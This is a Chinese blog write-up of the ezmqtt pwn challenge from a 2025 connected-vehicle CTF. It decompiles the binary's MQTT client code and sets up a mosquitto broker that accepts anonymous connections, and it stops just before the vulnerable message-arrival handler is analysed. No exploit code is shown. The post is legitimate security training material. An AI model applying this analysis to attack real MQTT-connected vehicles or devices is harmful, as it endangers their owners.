<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <meta name="description" content="题目附件
123456Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      PIE enabledRUNPATH:  b&amp;#x27;$ORIGIN&amp;#x27;
" />
  

  
  
  
  
  
  
  <title>强网杯2025车联网赛道-ezmqtt（easymqtt） | shanza&#39;s hideout</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="题目附件 123456Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      PIE enabledRUNPATH:  b&#x27;$ORIGIN&#x27;  题目提供了四份文件，ld-linux-x86-64.so.2 和 libc.so.6 库文件，pw">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯2025车联网赛道-ezmqtt（easymqtt）">
<meta property="og:url" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/index.html">
<meta property="og:site_name" content="shanza&#39;s hideout">
<meta property="og:description" content="题目附件 123456Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      PIE enabledRUNPATH:  b&#x27;$ORIGIN&#x27;  题目提供了四份文件，ld-linux-x86-64.so.2 和 libc.so.6 库文件，pw">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/1.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/2.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/3.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/4.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/5.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/6.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/7.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/8.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/9.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/10.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/11.png">
<meta property="og:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/12.png">
<meta property="article:published_time" content="2026-09-16T13:34:01.000Z">
<meta property="article:modified_time" content="2026-09-18T13:05:57.024Z">
<meta property="article:author" content="shanza">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/1.png">
  
  
    <link rel="icon" href="/css/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  

  
  <!-- baidu webmaster push -->
  <!-- <script src='//push.zhanzhang.baidu.com/push.js'></script> -->
<meta name="generator" content="Hexo 7.3.0"></head>
<body class="home blog custom-background custom-font-enabled single-author">
  <div id="page" class="hfeed site">
      <header id="masthead" class="site-header" role="banner">
    <hgroup>
      <h1 class="site-title">
        <a href="/" title="shanza&#39;s hideout" rel="home">shanza&#39;s hideout</a>
      </h1>
      
        <h2 class="site-description hitokoto">为君聊赋今日诗，努力请从今日始。</h2>
        <!-- <script type="text/javascript" src="https://v1.hitokoto.cn/?encode=js"></script> -->
      
    </hgroup>

    <nav id="site-navigation" class="main-navigation" role="navigation">
            <button class="menu-toggle">菜单</button>
            <a class="assistive-text" href="/#content" title="跳至内容">跳至内容</a><!--TODO-->
            <div class="menu-main-container">
                <ul id="menu-main" class="nav-menu">
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/">Home</a></li>
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/archives">Archives</a></li>
                
                </ul>
            </div>
    </nav>
</header>

      <div id="main" class="wrapper">
        <div id="primary" class="site-content"><div id="content" role="main"><article id="post-强网杯2025车联网赛道-ezmqtt（easymqtt）" class="post-强网杯2025车联网赛道-ezmqtt（easymqtt） post type-post status-publish format-standard hentry">
    <!---->

      <header class="entry-header">
        
        
  
    <h1 class="entry-title article-title">
      强网杯2025车联网赛道-ezmqtt（easymqtt）
    </h1>
  

        
        <div class="comments-link">
            
            <a href="javascript:void(0);" data-url="https://shanzade.github.io/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/" data-id="cmu6z56aq000di4vg4hisg9lp" class="leave-reply bdsharebuttonbox" data-cmd="more">Share</a>
        </div><!-- .comments-link -->
      </header><!-- .entry-header -->

    <div class="entry-content">
      
        <p><a href="./ezmqtt.zip">题目附件</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Full RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      PIE enabled</span><br><span class="line">RUNPATH:  b&#x27;$ORIGIN&#x27;</span><br></pre></td></tr></table></figure>

<p>题目提供了四份文件，<code>ld-linux-x86-64.so.2</code> 和 <code>libc.so.6</code> 库文件，<code>pwn</code> 主程序和 <code>libpaho-mqtt3c.so.1</code> mqtt 库。<br>mqtt 库是 github 上开源的一个项目；该赛道的另一道题 <code>babymqtt</code> 放入 ida9 中会自动识别 go 导入的库。<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/1.png"></p>
<p><a target="_blank" rel="noopener" href="https://github.com/eclipse-paho">https://github.com/eclipse-paho</a></p>
<p>easymqtt 这道题是 c 库，而 babymqtt 是 go 库，后者相对来说会更难一些。</p>
<p><em>这道题是赛后才解出来的，比赛时间应该是 2025 年 11 月左右。</em><br><em>比赛的时候也没解出来，赛后了解了 mqtt 协议之后才做出来的。所以这道题算是边学边解的。</em></p>
<h1 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h1><h2 id="main-函数"><a href="#main-函数" class="headerlink" title="main 函数"></a><code>main</code> 函数</h2><p>原本想尝试在 ida 中分析 elf 的同时导入 so，但是发现好像怎么导入都无法识别。<br>只能单独分开分析了，好在 so 库还有符号。<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/2.png"></p>
<p>mqtt 由 <strong>三种角色</strong> 组成：发布者 publisher、服务器 broker、订阅者 subscriber。<br><strong>发布者本身也可以是订阅者。</strong><br>发布者和订阅者都是客户端，服务器仅充当消息中转。</p>
<p>mqtt 根据 <strong>主题</strong> 来向各个客户端转发消息，主题通过 <code>/</code> 区分层级，例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chat  --  接收或发送至 chat 主题下的消息</span><br><span class="line">sensor/temperature  --  接收/发送至 sensor 下 temperature 的消息</span><br></pre></td></tr></table></figure>

<p>因为 so 库没有删除符号，所以可以通过 <code>File</code> -&gt; <code>Produce file</code> -&gt; <code>Create C header file...</code> 来导出 so 库的头文件到另一边进行分析。（虽说导入会报错，但是仍旧能够导入库内的很多结构体，对后续分析有点用）<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/3.png"></p>
<p>知道这些信息之后，配合 so 静态分析，就应该可以看懂 <code>main</code> 函数了。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">const</span> <span class="type">char</span> *brokerUrl; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">char</span> *brokerUrl1; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( argc &lt;= <span class="number">1</span> )</span><br><span class="line">    brokerUrl = <span class="string">&quot;tcp://localhost:9999&quot;</span>;         <span class="comment">// 服务器地址，默认连接到本地，也可以通过反代连接到主机（此处 pwn 运行在虚拟机）</span></span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    brokerUrl = argv[<span class="number">1</span>];</span><br><span class="line">  brokerUrl1 = (<span class="type">char</span> *)brokerUrl;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Using server at %s\n&quot;</span>, brokerUrl);</span><br><span class="line">  rc = MQTTClient_create(&amp;client, brokerUrl1, <span class="string">&quot;httpclient&quot;</span>, <span class="number">1</span>, <span class="number">0</span>);<span class="comment">// 类比创建套接字</span></span><br><span class="line">  <span class="keyword">if</span> ( rc )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Failed to create client, return code %d\n&quot;</span>, rc);</span><br><span class="line">    rc = <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    rc = MQTTClient_setCallbacks(client, <span class="number">0</span>, connlost, msgarrvd, delivered);<span class="comment">// 设置回调函数，mqtt 库会自动调用这 3 个方法，分别处理连接丢失、消息接收、消息发送三种情况</span></span><br><span class="line">    <span class="keyword">if</span> ( rc )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;Failed to set callbacks, return code %d\n&quot;</span>, rc);</span><br><span class="line">      rc = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      conn_opts.keepAliveInterval = <span class="number">20</span>;</span><br><span class="line">      conn_opts.cleansession = <span class="number">1</span>;</span><br><span class="line">      rc = MQTTClient_connect(client, &amp;conn_opts);<span class="comment">// &quot;MQTC\b&quot;</span></span><br><span class="line">      <span class="keyword">if</span> ( !rc )                                <span class="comment">// 发起连接</span></span><br><span class="line">      &#123;</span><br><span class="line">        MQTTClient_subscribe(client, <span class="string">&quot;HTTP&quot;</span>, <span class="number">1</span>);<span class="comment">// 订阅 HTTP 主题消息</span></span><br><span class="line">        <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">        &#123;</span><br><span class="line">          sleep(<span class="number">1u</span>);</span><br><span class="line">          msgsend(<span class="string">&quot;200&quot;</span>);                       <span class="comment">// 循环间隔 1 秒发送消息</span></span><br><span class="line">          <span class="built_in">puts</span>(<span class="string">&quot;waiting for message\n&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;Failed to connect, return code %d\n&quot;</span>, rc);</span><br><span class="line">      rc = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    MQTTClient_destroy((__int64 *)&amp;client);     <span class="comment">// 退出</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> rc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/</a><br>其中 <code>MQTTClient_create</code>、<code>MQTTClient_setCallbacks</code>、<code>MQTTClient_connect</code>、<code>MQTTClient_subscribe</code> 这几个重要函数的文档可以看：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#a9a0518d9ca924d12c1329dbe3de5f2b6">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#a9a0518d9ca924d12c1329dbe3de5f2b6</a><br><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aad27d07782991a4937ebf2f39a021f83">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aad27d07782991a4937ebf2f39a021f83</a><br><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aaa8ae61cd65c9dc0846df10122d7bd4e">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aaa8ae61cd65c9dc0846df10122d7bd4e</a><br><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#a9c1c28258f0d5c6a44ff53a98618f5f3">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#a9c1c28258f0d5c6a44ff53a98618f5f3</a></p>
</blockquote>
<p>也可以看 so 库静态分析的内容（只有函数签名和实现等内容）。</p>
<p>整个 <code>main</code> 函数可以看作是建立 tcp 然后发消息那样。<br>首先调用 <code>create</code> 函数创建套接字，此处第 3 个参数 <code>clientId</code>，是 mqtt 中的客户端 id，用于唯一标识客户端连接与会话的重要字段，代表 <code>pwn</code> 以 <code>httpclient</code> 为客户端 id。<br>然后 <code>setCallbacks</code> 设置 mqtt 回调函数。<br>接下来 <code>connect</code> 尝试连接到 mqtt broker。<br><code>subscribe</code> 订阅指定主题的消息，此处是 <code>HTTP</code> 这个主题，并指定 <code>qos</code> 为 1，表示消息至少传送一次。<br>最后循环调用 <code>msgsend</code> 函数，该函数里层还有内容。</p>
<h2 id="查看-msgsend"><a href="#查看-msgsend" class="headerlink" title="查看 msgsend"></a>查看 <code>msgsend</code></h2><p>ida 刚点进这个函数的时候可能没有自动识别结构体。没关系，注意到 <code>MQTTClient_publishMessage</code> 这个函数的调用，看签名：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall <span class="title function_">MQTTClient_publishMessage</span><span class="params">(</span></span><br><span class="line"><span class="params">        MQTTClient handle,</span></span><br><span class="line"><span class="params">        <span class="type">const</span> <span class="type">char</span> *topicName,</span></span><br><span class="line"><span class="params">        MQTTClient_message *message,</span></span><br><span class="line"><span class="params">        MQTTClient_deliveryToken *deliveryToken)</span></span><br></pre></td></tr></table></figure>

<p>注意到向这个函数传入的 <code>pubmsg</code>，本质是一个 <code>MQTTClient_message</code> 结构体，按 <code>Y</code> 键修改其类型即可。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">msgsend</span><span class="params">(<span class="type">char</span> *arg)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> v2; <span class="comment">// [rsp+1Ch] [rbp-114h]</span></span><br><span class="line">  <span class="type">char</span> s[<span class="number">264</span>]; <span class="comment">// [rsp+20h] [rbp-110h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 cookie; <span class="comment">// [rsp+128h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  cookie = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">snprintf</span>(s, <span class="number">0x100</span>u, <span class="string">&quot;&#123;\&quot;clientid\&quot;:\&quot;%s\&quot;, \&quot;message\&quot;:\&quot;%s\&quot;&#125;&quot;</span>, <span class="string">&quot;httpclient&quot;</span>, arg);</span><br><span class="line">  pubmsg.payload = s;</span><br><span class="line">  pubmsg.payloadlen = <span class="built_in">strlen</span>(s);</span><br><span class="line">  pubmsg.qos = <span class="number">1</span>;</span><br><span class="line">  pubmsg.retained = <span class="number">0</span>;</span><br><span class="line">  LODWORD(token) = <span class="number">0</span>;</span><br><span class="line">  v2 = MQTTClient_publishMessage(client, <span class="string">&quot;HTTP&quot;</span>, &amp;pubmsg, &amp;token);</span><br><span class="line">  <span class="keyword">if</span> ( v2 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Failed to publish message, return code %d\n&quot;</span>, v2);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>简单来说，就是设置了一些要发送的内容和参数，然后交由 mqtt 库进行发送。</p>
<p>提一嘴，<code>MQTTClient_publishMessage</code> 的文档见：<br><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#ace320b8a92c7087d9dd5cf242d50389d">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#ace320b8a92c7087d9dd5cf242d50389d</a></p>
<p>此处可以进行测试，看是否能收到该 <code>pwn</code> 发送的信息。<br>但是在此之前，需要先安装一个 mqtt broker 才能够接收。</p>
<h2 id="mosquitto-broker-配置"><a href="#mosquitto-broker-配置" class="headerlink" title="mosquitto broker 配置"></a>mosquitto broker 配置</h2><p>此处选用 mosquitto 作为 mqtt 服务器。官网：<br><a target="_blank" rel="noopener" href="https://mosquitto.org/">https://mosquitto.org/</a><br>安装方式（我使用的系统是 mint linux）：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install mosquitto</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://mosquitto.org/download/">https://mosquitto.org/download/</a></p>
<p>安装完成之后会自动启动为服务。我没有这方面的需求，而且启动为服务之后还要反复 <code>systemctl</code> 重启，所以直接关掉，后面手动启动。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo systemctl stop mosquitto</span><br><span class="line">sudo systemctl disable mosquitto</span><br></pre></td></tr></table></figure>

<p>因为其默认配置是为了服务而设置的，所以需要改一些东西。<br>并且我使用的是 vmware，从虚拟机反代出来数据似乎比较麻烦，而 <code>mosquitto -p 9999</code> 只允许 <code>localhost</code> 访问，所以此处不得不修改配置。<br>此处我的配置如下（配置文件在 <code>/etc/mosquitto/mosquitto.conf</code>）：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Place your <span class="built_in">local</span> configuration <span class="keyword">in</span> /etc/mosquitto/conf.d/</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"></span></span><br><span class="line"><span class="language-bash"><span class="comment"># A full description of the configuration file is at</span></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">/usr/share/doc/mosquitto/examples/mosquitto.conf.example</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">pid_file /run/mosquitto/mosquitto.pid</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="literal">true</span></span></span><br><span class="line">persistence false</span><br><span class="line">persistence_location /var/lib/mosquitto/</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">log_dest file /var/log/mosquitto/mosquitto.log</span></span><br><span class="line"></span><br><span class="line">include_dir /etc/mosquitto/conf.d</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">&gt;..</span></span><br><span class="line">listener 9999</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">必须允许匿名，否则 pwn 无法连接</span></span><br><span class="line">allow_anonymous true</span><br></pre></td></tr></table></figure>

<p>随后 <code>mosquitto -c ./mosquitto.conf</code> 即可启动。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1789560763: mosquitto version 2.0.11 starting</span><br><span class="line">1789560763: Config loaded from ./mosquitto.conf.</span><br><span class="line">1789560763: Opening ipv4 listen socket on port 9999.</span><br><span class="line">1789560763: Opening ipv6 listen socket on port 9999.</span><br><span class="line">1789560763: mosquitto version 2.0.11 running</span><br></pre></td></tr></table></figure>

<p>启动 <code>./pwn</code>，会发现已经有数据发送。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">Using server at tcp://localhost:9999</span><br><span class="line">waiting for message</span><br><span class="line"></span><br><span class="line">Message with token value 2 delivery confirmed</span><br><span class="line">waiting for message</span><br><span class="line"></span><br><span class="line">Message with token value 3 delivery confirmed</span><br><span class="line">waiting for message</span><br><span class="line"></span><br><span class="line">Message with token value 4 delivery confirmed</span><br><span class="line">waiting for message</span><br><span class="line"></span><br><span class="line">Message with token value 5 delivery confirmed</span><br><span class="line">waiting for message</span><br></pre></td></tr></table></figure>

<p>此时在主机启动 mqtt 客户端，我使用的是 mqttx。<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/4.png"></p>
<p>连接成功之后就可以添加订阅了。还记得刚才的 <code>HTTP</code> 主题吗，直接添加即可。<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/5.png"></p>
<p>添加完成之后就会收到 <code>pwn</code> 发来的消息了，与 <code>msgsend</code> 函数中定义的一样。<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/6.png"></p>
<h2 id="msgarrvd-函数"><a href="#msgarrvd-函数" class="headerlink" title="msgarrvd 函数"></a><code>msgarrvd</code> 函数</h2><p>既然能够接收数据了，那应该如何接收数据呢？漏洞又在哪呢？<br>还记得之前的：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rc = MQTTClient_setCallbacks(client, <span class="number">0</span>, connlost, msgarrvd, delivered);</span><br></pre></td></tr></table></figure>
<p>此处的 <code>msgarrvd</code> 就是接收数据的逻辑。为什么？看文档：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aad27d07782991a4937ebf2f39a021f83">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aad27d07782991a4937ebf2f39a021f83</a><br><a target="_blank" rel="noopener" href="https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aa42130dd069e7e949bcab37b6dce64a5">https://eclipse-paho.github.io/paho.mqtt.c/MQTTClient/html/_m_q_t_t_client_8h.html#aa42130dd069e7e949bcab37b6dce64a5</a></p>
</blockquote>
<p>接收回调函数的签名如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">int</span> <span class="title function_">MQTTClient_messageArrived</span><span class="params">(<span class="type">void</span> *context, <span class="type">char</span> *topicName, <span class="type">int</span> topicLen, MQTTClient_message *message)</span></span><br></pre></td></tr></table></figure>
<ul>
<li><code>context</code> 即前面创建的 “套接字”；</li>
<li><code>topicName</code> 即主题名；</li>
<li><code>topicLen</code> （？？？）；</li>
<li><code>message</code> 接收到的消息；</li>
</ul>
<p>整理一下：</p>
